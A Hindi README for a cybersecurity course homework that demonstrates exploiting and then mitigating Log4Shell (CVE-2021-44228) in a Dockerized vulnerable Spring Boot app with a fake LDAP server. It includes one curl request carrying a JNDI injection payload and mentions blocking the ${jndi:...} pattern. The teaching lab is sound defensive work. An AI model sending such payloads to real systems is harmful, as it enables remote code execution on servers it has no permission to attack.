
SEAS 8405 के लिए Log4Shell (CVE-2021-44228) शोषण डेमो। इसमें एक कमजोर Spring Boot ऐप, नकली LDAP सर्वर, Docker सेटअप, MITRE मैपिंग, घटना प्रतिक्रिया, और एक पूर्ण स्क्रीन रिकॉर्डिंग शामिल है।
यह परियोजना Dockerized Java वेब एप्लिकेशन का उपयोग करके Log4Shell भेद्यता (CVE-2021-44228) के शोषण और शमन को प्रदर्शित करती है, जिसमें कमजोर Log4j 2.14.1 शामिल है। सेटअप में JNDI इंजेक्शन हमले के पथ को प्रदर्शित करने के लिए एक अनुकरणीय दुर्भावनापूर्ण LDAP सर्वर भी शामिल है।
शोषण के बाद, Log4j को अपग्रेड करके, इनपुट को मान्य करके, और MITRE D3FEND तथा ATT&CK अनुशंसाओं को लागू करके सिस्टम को कठोर किया जाता है।
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
docker build -t vulnerable-app .
docker-compose up
ऐप इस पते पर चलेगा:
http://localhost:8080
python3 ldap_server.py
ऐप को इस तरह का अनुरोध भेजें:
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
LDAP सर्वर को अनुरोध प्राप्त होना चाहिए (यह JNDI शोषण का अनुकरण करता है)।
हमले का प्रदर्शन करने के बाद, सिस्टम को निम्नलिखित द्वारा सुरक्षित किया गया:
${jndi:....} पैटर्न को अवरुद्ध करना)mitigation_report.pdf देखें:
यदि वीडियो सीधे अपलोड नहीं किया गया है, तो यह रिपोर्ट के लिंक पर उपलब्ध है।
Serpil Rivas
SEAS 8405 – Cybersecurity Architectures
मई 2025